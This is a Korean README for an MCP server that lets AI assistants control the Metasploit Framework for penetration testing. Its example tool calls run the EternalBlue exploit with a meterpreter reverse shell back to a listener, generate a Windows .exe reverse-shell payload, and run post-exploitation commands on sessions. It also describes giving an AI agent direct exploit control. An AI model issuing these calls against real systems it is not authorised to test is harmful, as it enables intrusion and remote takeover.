Metasploit용 MCP 서버
Metasploit Framework 통합을 위한 Model Context Protocol(MCP) 서버입니다.
https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1
이 MCP 서버는 Claude와 같은 대규모 언어 모델과 Metasploit Framework 침투 테스트 플랫폼 간의 브리지를 제공합니다. AI 어시스턴트가 표준화된 도구를 통해 Metasploit 기능에 동적으로 접근하고 제어할 수 있게 하여, 복잡한 보안 테스트 워크플로우에 자연어 인터페이스를 제공합니다.
pip install -r requirements.txt
MSF_PASSWORD=yourpassword
MSF_SERVER=127.0.0.1
MSF_PORT=55553
MSF_SSL=false
PAYLOAD_SAVE_DIR=/path/to/save/payloads # Optional: Where to save generated payloads
Metasploit RPC 서비스를 시작합니다:
msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553
서버는 두 가지 전송 방식을 지원합니다:
--transport 플래그를 사용하여 전송 모드를 명시적으로 선택할 수 있습니다:
# Run with HTTP/SSE transport (default)
python MetasploitMCP.py --transport http
# Run with STDIO transport
python MetasploitMCP.py --transport stdio
HTTP 모드의 추가 옵션:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
Claude Desktop 통합을 위해 claude_desktop_config.json을 구성합니다:
{
"mcpServers": {
"metasploit": {
"command": "uv",
"args": [
"--directory",
"C:\\path\\to\\MetasploitMCP",
"run",
"MetasploitMCP.py",
"--transport",
"stdio"
],
"env": {
"MSF_PASSWORD": "yourpassword"
}
}
}
}
HTTP/SSE를 사용하는 다른 MCP 클라이언트의 경우:
HTTP 모드에서 서버를 시작합니다:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
MCP 클라이언트가 다음에 연결하도록 구성합니다:
http://your-server-ip:8085/sse⚠️ 중요한 보안 경고:
이 도구는 강력한 익스플로잇 기능을 포함하는 Metasploit Framework 기능에 대한 직접적인 접근을 제공합니다. 책임감 있게 사용하고, 보안 테스트를 수행할 수 있는 명시적 권한이 있는 환경에서만 사용하십시오.
list_exploits("ms17_010")run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})list_active_sessions()send_session_command(1, "whoami")run_post_module("windows/gather/enum_logged_on_users", 1)send_session_command(1, "sysinfo")terminate_session(1)start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)list_listeners()generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})stop_job(1)이 프로젝트는 안정성과 유지보수성을 보장하기 위한 포괄적인 단위 및 통합 테스트를 포함합니다.
테스트 의존성을 설치합니다:
pip install -r requirements-test.txt
또는 편리한 설치 프로그램을 사용합니다:
python run_tests.py --install-deps
# OR
make install-deps
# Run all tests
python run_tests.py --all
# OR
make test
# Run with coverage report
python run_tests.py --all --coverage
# OR
make coverage
# Run with HTML coverage report
python run_tests.py --all --coverage --html
# OR
make coverage-html
# Unit tests only
python run_tests.py --unit
# OR
make test-unit
# Integration tests only
python run_tests.py --integration
# OR
make test-integration
# Options parsing tests
python run_tests.py --options
# OR
make test-options
# Helper function tests
python run_tests.py --helpers
# OR
make test-helpers
# MCP tools tests
python run_tests.py --tools
# OR
make test-tools
# Include slow tests
python run_tests.py --all --slow
# Include network tests (requires actual network)
python run_tests.py --all --network
# Verbose output
python run_tests.py --all --verbose
# Quick test (no coverage, fail fast)
make quick-test
# Debug mode (detailed failure info)
make test-debug
tests/test_options_parsing.py: graceful 옵션 파싱 기능에 대한 단위 테스트tests/test_helpers.py: 내부 헬퍼 함수 및 MSF 클라이언트 관리에 대한 단위 테스트tests/test_tools_integration.py: 모의(mocked) Metasploit 백엔드를 사용한 모든 MCP 도구에 대한 통합 테스트conftest.py: 공유 테스트 픽스처 및 구성pytest.ini: 커버리지 설정이 포함된 Pytest 구성커버리지와 함께 테스트를 실행한 후 보고서는 다음 위치에서 확인할 수 있습니다:
htmlcov/index.html(--html 옵션 사용 시)지속적 통합(CI)을 위해:
# CI-friendly test command
make ci-test
# OR
python run_tests.py --all --coverage --verbose
기본적으로 generate_payload로 생성된 페이로드는 홈 폴더의 payloads 디렉터리(~/payloads 또는 C:\Users\YourUsername\payloads)에 저장됩니다. PAYLOAD_SAVE_DIR 환경 변수를 설정하여 이 위치를 사용자 지정할 수 있습니다.
환경 변수 설정:
Windows (PowerShell):
$env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"
Windows (명령 프롬프트):
set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloads
Linux/macOS:
export PAYLOAD_SAVE_DIR=/custom/path/to/payloads
Claude Desktop 구성에서:
"env": {
"MSF_PASSWORD": "yourpassword",
"PAYLOAD_SAVE_DIR": "C:\\your\\actual\\path\\to\\payloads" // Only add if you want to override the default
}
참고: 사용자 지정 경로를 지정하는 경우 해당 경로가 존재하거나 애플리케이션에 생성 권한이 있는지 확인하십시오. 경로가 잘못된 경우 페이로드 생성이 실패할 수 있습니다.
Apache 2.0